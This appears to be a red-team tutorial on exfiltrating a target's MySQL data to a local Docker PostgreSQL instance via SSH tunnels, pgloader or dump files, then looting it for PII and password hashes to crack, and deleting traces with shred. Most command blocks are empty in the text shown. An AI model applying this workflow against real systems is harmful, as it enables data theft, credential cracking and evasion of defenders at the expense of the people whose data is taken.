Introduction
As a seasoned red teamer, gaining shell access is often just the beginning. The real value—the “crown jewels”—usually lives in the database. You might find customer data, intellectual property, or plain-text credentials that unlock the rest of the network.
Often, you land on a target running MySQL. While you can query it in place, this is risky. Long-running analytical queries can spike CPU usage, alert defenders, or even lock production tables, causing a Denial of Service.
The Solution: Exfiltrate the data to a local environment where you can analyze it safely and aggressively.
In this guide, we will use Docker to spin up a sacrificial PostgreSQL instance and pgloader to automagically convert the target’s MySQL schema and data into Postgres format.
Why Postgres? Because it offers superior analytical capabilities (regex, full-text search) and integrates better with many offline analysis tools than MySQL. Plus, pgloader handles the dirty work of type conversion for us.
Part 1: The Red Team Infrastructure
Before we move data, we need a stable container to hold it. We use Docker to keep our host OS clean.
1. Spinning up PostgreSQL via Docker
We must mount a volume so that the data persists even if the container crashes.
| |
2. Preparing the Tunnel (For Live Migration)
If you have a live connection to the target network, you need to expose the internal MySQL port (3306) to your localhost.
| |
Note: We assume the MySQL server is listening on localhost of the pivot host. If it’s a different server, adjust the jump.
Part 2: The “Live” Migration (Networked)
If you have a high-bandwidth, stable connection, pgloader can stream data directly from the target to your local Docker container. This is the fastest method.
1. Installing pgloader
| |
2. The Migration Command
pgloader handles schema translation (e.g., converting MySQL INT(11) to Postgres integer).
| |
Under the Hood:
- Connects to MySQL (Target) via the SSH tunnel.
- Connects to Postgres (Local) via Docker.
- Reads schema, converts types, creates tables.
- Batches and streams data.
[!NOTE] If you encounter SSL errors connecting to older MySQL servers, add
?useSSL=falseto the source connection string.
Part 3: The “Offline” Migration (Air-Gapped / Restricted)
Sometimes, you cannot open a direct tunnel. The network might be unstable, or strict egress filtering blocks your connection. In this case, you must dump the data to a file, exfiltrate the file, and load it locally.
Step 1: Dump on Target
Use mysqldump to create a standard SQL backup.
| |
--compatible=postgresql: Helps (but doesn’t perfectly fix) dialect issues.
Step 2: Exfiltrate
Use scp, rsync, or even split it into base64 chunks over DNS if you are desperate.
| |
Step 3: Load with pgloader
pgloader can read from files too!
| |
Part 4: Deep Analysis and Looting
Now that you have the data locally, you can run aggressive queries without fear of crashing production.
Finding PII (Personally Identifiable Information)
| |
Extracting Hashes for Cracking
If the MySQL database stored application passwords, export them for Hashcat.
| |
Cross-Referencing Data
You can now join tables that would be too expensive to join on a live system, hunting for patterns like user reuse of passwords or common email domains.
Part 5: OpSec and Forensic Considerations
- Network Spike: A “Live” migration creates a massive, sustained download stream. This looks like data exfiltration (because it is). Network flow logs will catch this.
- Disk I/O: The “Offline” method creates a large file on the target disk. Ensure you delete
dump.sqlanddump.sql.gzimmediately after transfer. useshred -uif possible. - Process List:
mysqldumpandsshprocesses are visible. - Cleanup:
1 2 3# Stop the local container when done analyzing docker stop postgres-exfil # The data persists in ~/loot/postgres_data if you need it later.
Conclusion
The combination of Docker and pgloader provides a high-speed, reliable pipeline for analyzing target data. Whether you stream it live through a tunnel or carry it out as a dump file, getting the data onto your own infrastructure allows you to work smarter, not harder.
Data is the ultimate payload. Treat it with respect.
Happy hunting!